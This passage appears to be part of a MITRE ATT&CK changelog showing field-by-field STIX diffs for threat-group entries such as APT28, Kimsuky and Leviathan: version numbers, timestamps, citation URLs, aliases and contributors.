| external_references | | {'source_name': 'Proofpoint Iranian Aligned Attacks JAN 2020', 'description': 'Proofpoint. (2020, January 10). Iranian State-Sponsored and Aligned Attacks: What You Need to Know and Steps to Protect Yourself. Retrieved January 16, 2025.', 'url': 'https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect'} |
| external_references | | {'source_name': 'Symantec Crambus OCT 2023', 'description': 'Symantec Threat Hunter Team. (2023, October 19). Crambus: New Campaign Targets Middle Eastern Government. Retrieved November 27, 2024.', 'url': 'https://www.security.com/threat-intelligence/crambus-middle-east-government'} |
| x_mitre_contributors | | Jaesang Oh, KC7 Foundation |
Minor Version Changes
[G0007] APT28
Current version: 5.2
Version changed from: 5.1 → 5.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-10 14:31:01.968000+00:00 | 2025-03-10 20:15:06.958000+00:00 |
| external_references[22]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
| external_references[22]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
| external_references[33]['description'] | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. | Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024. |
| external_references[33]['url'] | https://www.justice.gov/file/1080281/download | https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf |
| x_mitre_version | 5.1 | 5.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| aliases | | GruesomeLarch |
| external_references | | {'source_name': 'GruesomeLarch', 'description': '(Citation: Nearest Neighbor Volexity)'} |
| external_references | | {'source_name': 'Nearest Neighbor Volexity', 'description': 'Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.', 'url': 'https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/'} |
[G0016] APT29
Current version: 6.2
Version changed from: 6.1 → 6.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-03 18:48:32.299000+00:00 | 2025-04-04 17:07:43.344000+00:00 |
| x_mitre_version | 6.1 | 6.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | Vicky Ray, RayvenX |
[G0082] APT38
Current version: 3.1
Version changed from: 3.0 → 3.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | ['Hiroki Nagahama, NEC Corporation', 'Manikantan Srinivasan, NEC Corporation India', 'Pooja Natarajan, NEC Corporation India'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-26 16:33:33.984000+00:00 | 2025-01-22 21:54:11.727000+00:00 |
| external_references[11]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024. |
| x_mitre_version | 3.0 | 3.1 |
[G1023] APT5
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-14 18:53:21.577000+00:00 | 2025-04-04 17:08:23.100000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[G1003] Ember Bear
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-06 21:43:44.941000+00:00 | 2024-12-03 20:19:38.721000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[G0004] Ke3chang
Current version: 3.1
Version changed from: 3.0 → 3.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-08 21:47:14.257000+00:00 | 2025-04-04 17:08:55.617000+00:00 |
| x_mitre_version | 3.0 | 3.1 |
[G0094] Kimsuky
Current version: 5.1
Version changed from: 5.0 → 5.1
|
|
|---|
| t | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North | t | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North |
| Korea-based cyber espionage group that has been active since | | Korea-based cyber espionage group that has been active since |
| at least 2012. The group initially focused on targeting Sou | | at least 2012. The group initially focused on targeting Sou |
| th Korean government entities, think tanks, and individuals | | th Korean government entities, think tanks, and individuals |
| identified as experts in various fields, and expanded its op | | identified as experts in various fields, and expanded its op |
| erations to include the UN and the government, education, bu | | erations to include the UN and the government, education, bu |
| siness services, and manufacturing sectors in the United Sta | | siness services, and manufacturing sectors in the United Sta |
| tes, Japan, Russia, and Europe. [Kimsuky](https://attack.mit | | tes, Japan, Russia, and Europe. [Kimsuky](https://attack.mit |
| re.org/groups/G0094) has focused its intelligence collection | | re.org/groups/G0094) has focused its intelligence collection |
| activities on foreign policy and national security issues r | | activities on foreign policy and national security issues r |
| elated to the Korean peninsula, nuclear policy, and sanction | | elated to the Korean peninsula, nuclear policy, and sanction |
| s. [Kimsuky](https://attack.mitre.org/groups/G0094) operatio | | s. [Kimsuky](https://attack.mitre.org/groups/G0094) operatio |
| ns have overlapped with those of other North Korean cyber es | | ns have overlapped with those of other North Korean cyber es |
| pionage actors likely as a result of ad hoc collaborations o | | pionage actors likely as a result of ad hoc collaborations o |
| r other limited resource sharing.(Citation: EST Kimsuky Apri | | r other limited resource sharing.(Citation: EST Kimsuky Apri |
| l 2019)(Citation: Cybereason Kimsuky November 2020)(Citation | | l 2019)(Citation: Cybereason Kimsuky November 2020)(Citation |
| : Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A K | | : Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A K |
| imsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proof | | imsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proof |
| point TA427 April 2024) [Kimsuky](https://attack.mitre.org/ | | point TA427 April 2024) [Kimsuky](https://attack.mitre.org/ |
| groups/G0094) was assessed to be responsible for the 2014 Ko | | groups/G0094) was assessed to be responsible for the 2014 Ko |
| rea Hydro & Nuclear Power Co. compromise; other notable camp | | rea Hydro & Nuclear Power Co. compromise; other notable camp |
| aigns include Operation STOLEN PENCIL (2018), Operation Kaba | | aigns include Operation STOLEN PENCIL (2018), Operation Kaba |
| r Cobra (2019), and Operation Smoke Screen (2019).(Citation: | | r Cobra (2019), and Operation Smoke Screen (2019).(Citation: |
| Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky Smok | | Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky Smok |
| eScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb | | eScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb |
| 2019) North Korean group definitions are known to have sig | | 2019) North Korean group definitions are known to have sig |
| nificant overlap, and some security researchers report all N | | nificant overlap, and some security researchers report all N |
| orth Korean state-sponsored cyber activity under the name [L | | orth Korean state-sponsored cyber activity under the name [L |
| azarus Group](https://attack.mitre.org/groups/G0032) instead | | azarus Group](https://attack.mitre.org/groups/G0032) instead |
| of tracking clusters or subgroups. | | of tracking clusters or subgroups. In 2023, [Kimsuky](http |
| | | s://attack.mitre.org/groups/G0094) has used commercial large |
| | | language models to assist with vulnerability research, scri |
| | | pting, social engineering and reconnaissance.(Citation: MSFT |
| | | -AI) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-10 14:32:27.067000+00:00 | 2025-01-29 21:17:48.165000+00:00 |
| description | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the UN and the government, education, business services, and manufacturing sectors in the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions. [Kimsuky](https://attack.mitre.org/groups/G0094) operations have overlapped with those of other North Korean cyber espionage actors likely as a result of ad hoc collaborations or other limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024)
[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the UN and the government, education, business services, and manufacturing sectors in the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions. [Kimsuky](https://attack.mitre.org/groups/G0094) operations have overlapped with those of other North Korean cyber espionage actors likely as a result of ad hoc collaborations or other limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024)
[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.
In 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) has used commercial large language models to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI) |
| x_mitre_version | 5.0 | 5.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| aliases | | Springtail |
| external_references | | {'source_name': 'Springtail', 'description': '(Citation: Symantec Troll Stealer 2024)'} |
| external_references | | {'source_name': 'MSFT-AI', 'description': 'Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/'} |
| external_references | | {'source_name': 'Symantec Troll Stealer 2024', 'description': 'Symantec Threat Hunter Team. (2024, May 16). Springtail: New Linux Backdoor Added to Toolkit. Retrieved January 17, 2025.', 'url': 'https://www.security.com/threat-intelligence/springtail-kimsuky-backdoor-espionage'} |
| x_mitre_contributors | | Jaesang Oh, KC7 Foundation |
[G1004] LAPSUS$
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-11 21:51:11.405000+00:00 | 2025-04-07 14:44:59.715000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | mobile-attack |
[G0032] Lazarus Group
Current version: 4.1
Version changed from: 4.0 → 4.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 16:06:34.699000+00:00 | 2025-04-16 17:21:11.622000+00:00 |
| x_mitre_version | 4.0 | 4.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | MyungUk Han, ASEC |
| x_mitre_contributors | | Jun Hirata, NEC Corporation |
| x_mitre_contributors | | Manikantan Srinivasan, NEC Corporation India |
| x_mitre_contributors | | Pooja Natarajan, NEC Corporation India |
[G0065] Leviathan
Current version: 4.1
Version changed from: 4.0 → 4.1
|
|
|---|
| t | [Leviathan](https://attack.mitre.org/groups/G0065) is a Chin | t | [Leviathan](https://attack.mitre.org/groups/G0065) is a Chin |
| ese state-sponsored cyber espionage group that has been attr | | ese state-sponsored cyber espionage group that has been attr |
| ibuted to the Ministry of State Security's (MSS) Hainan Stat | | ibuted to the Ministry of State Security's (MSS) Hainan Stat |
| e Security Department and an affiliated front company.(Citat | | e Security Department and an affiliated front company.(Citat |
| ion: CISA AA21-200A APT40 July 2021) Active since at least 2 | | ion: CISA AA21-200A APT40 July 2021) Active since at least 2 |
| 009, [Leviathan](https://attack.mitre.org/groups/G0065) has | | 009, [Leviathan](https://attack.mitre.org/groups/G0065) has |
| targeted the following sectors: academia, aerospace/aviation | | targeted the following sectors: academia, aerospace/aviation |
| , biomedical, defense industrial base, government, healthcar | | , biomedical, defense industrial base, government, healthcar |
| e, manufacturing, maritime, and transportation across the US | | e, manufacturing, maritime, and transportation across the US |
| , Canada, Europe, the Middle East, and Southeast Asia.(Citat | | , Canada, Australia, Europe, the Middle East, and Southeast |
| ion: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Le | | Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Pr |
| viathan Oct 2017)(Citation: FireEye Periscope March 2018) | | oofpoint Leviathan Oct 2017)(Citation: FireEye Periscope Mar |
| | | ch 2018)(Citation: CISA Leviathan 2024) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-08 20:33:16.460000+00:00 | 2025-02-03 21:55:54.314000+00:00 |
| description | [Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018) | [Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA Leviathan 2024) |
| x_mitre_version | 4.0 | 4.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'CISA Leviathan 2024', 'description': 'CISA et al. (2024, July 8). People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action. Retrieved February 3, 2025.', 'url': 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a'} |
[G0034] Sandworm Team
Current version: 4.2
Version changed from: 4.1 → 4.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 17:37:44.040000+00:00 | 2024-12-04 21:17:08.593000+00:00 |
| x_mitre_version | 4.1 | 4.2 |
[G0128] ZIRCONIUM
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-10 14:32:51.085000+00:00 | 2025-04-04 17:09:39.718000+00:00 |
| x_mitre_version | 2.1 | 2.2 |
Patches
[G1028] APT-C-23
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 15:31:48.747000+00:00 | 2024-11-17 20:01:55.806000+00:00 |
| external_references[7]['description'] | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved March 4, 2024. | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved November 17, 2024. |
| external_references[7]['url'] | https://web.archive.org/web/20231126111812/https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf | https://web.archive.org/web/20231126111812/https:/about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf |
[G0099] APT-C-36
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-05-26 20:17:53.085000+00:00 | 2025-04-16 20:37:39.643000+00:00 |
[G0006] APT1
Current version: 1.4
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-05-26 12:23:48.842000+00:00 | 2025-04-16 20:37:37.426000+00:00 |
[G0005] APT12
Current version: 2.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:44:59.268000+00:00 | 2025-04-16 20:37:37.119000+00:00 |
[G0023] APT16
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-26 23:33:26.354000+00:00 | 2025-04-16 20:37:41.686000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0025] APT17
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-04 17:04:35.669000+00:00 | 2024-11-17 15:03:54.769000+00:00 |
| external_references[3]['description'] | FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016. | FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved November 17, 2024. |
[G0013] APT30
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-29 19:34:28.999000+00:00 | 2024-11-17 15:05:25.104000+00:00 |
| external_references[2]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
[G0067] APT37
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-06-26 18:59:30.461000+00:00 | 2024-11-17 15:01:33.384000+00:00 |
| external_references[10]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[10]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G1007] Aoqin Dragon
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 18:50:40.179000+00:00 | 2025-04-16 20:37:33.761000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[G0001] Axiom
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 22:03:44.661000+00:00 | 2025-04-16 20:37:36.790000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0060] BRONZE BUTLER
Current version: 1.3
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-12 19:42:16.869000+00:00 | 2025-04-16 20:37:34.368000+00:00 |
[G0135] BackdoorDiplomacy
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 19:47:11.389000+00:00 | 2025-04-16 20:37:34.519000+00:00 |
[G0063] BlackOasis
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:37:41.036000+00:00 |
[G0098] BlackTech
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-06 13:14:27.477000+00:00 | 2025-04-16 20:37:33.408000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0008] Carbanak
Current version: 2.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 21:02:30.899000+00:00 | 2025-04-16 20:37:39.338000+00:00 |
[G0003] Cleaver
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-22 18:37:22.178000+00:00 | 2025-04-16 20:37:38.869000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0080] Cobalt Group
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 03:28:29.415000+00:00 | 2025-04-16 20:37:34.214000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0142] Confucius
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-22 20:43:16.504000+00:00 | 2025-04-16 20:37:36.476000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0052] CopyKittens
Current version: 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-08-08 21:29:36.462000+00:00 | 2024-11-17 12:44:07.637000+00:00 |
| external_references[4]['description'] | Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017. | Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf | https://cdn2.hubspot.net/hubfs/1903456/Whitepapers/CopyKittens.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0079] DarkHydrus
Current version: 1.3
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-12 19:52:22.454000+00:00 | 2025-04-16 20:37:39.039000+00:00 |
[G0105] DarkVishnya
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-12 22:10:04.107000+00:00 | 2025-04-16 20:37:35.190000+00:00 |
[G0009] Deep Panda
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-20 20:10:29.593000+00:00 | 2025-04-16 20:37:39.486000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[G0017] DragonOK
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-03-22 20:10:32.917000+00:00 | 2024-11-17 16:27:34.666000+00:00 |
| external_references[2]['description'] | Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015. | Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf | https://web.archive.org/web/20210920193513/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf |
[G1011] EXOTIC LILY
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 18:48:18.917000+00:00 | 2025-04-16 20:37:34.060000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[G0066] Elderwood
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 02:36:24.044000+00:00 | 2024-11-17 19:55:07.587000+00:00 |
| external_references[6]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
[G0020] Equation
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-29 01:39:22.044000+00:00 | 2025-04-16 20:37:33.110000+00:00 |
[G0120] Evilnum
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-27 19:55:58.323000+00:00 | 2025-04-16 20:37:38.720000+00:00 |
[G0051] FIN10
Current version: 1.3
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-05-26 12:35:39.400000+00:00 | 2024-11-17 14:57:09.164000+00:00 |
| external_references[2]['description'] | FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017. | FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf | https://services.google.com/fh/files/misc/rpt-fin-10-anatomy-of-a-cyber-en.pdf |
[G0085] FIN4
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-02-01 21:27:44.778000+00:00 | 2024-11-17 15:57:47.485000+00:00 |
| external_references[2]['description'] | Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018. | Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html | https://web.archive.org/web/20190508171649/https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0053] FIN5
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 19:48:37.809000+00:00 | 2025-04-16 20:37:38.089000+00:00 |
[G0037] FIN6
Current version: 4.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-08 22:13:27.588000+00:00 | 2024-11-17 14:59:25.749000+00:00 |
| external_references[8]['description'] | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. | FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved November 17, 2024. |
| external_references[8]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf | https://web.archive.org/web/20190807112824/https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf |
[G0061] FIN8
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-19 14:08:59.296000+00:00 | 2025-04-16 20:37:35.846000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[G0137] Ferocious Kitten
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
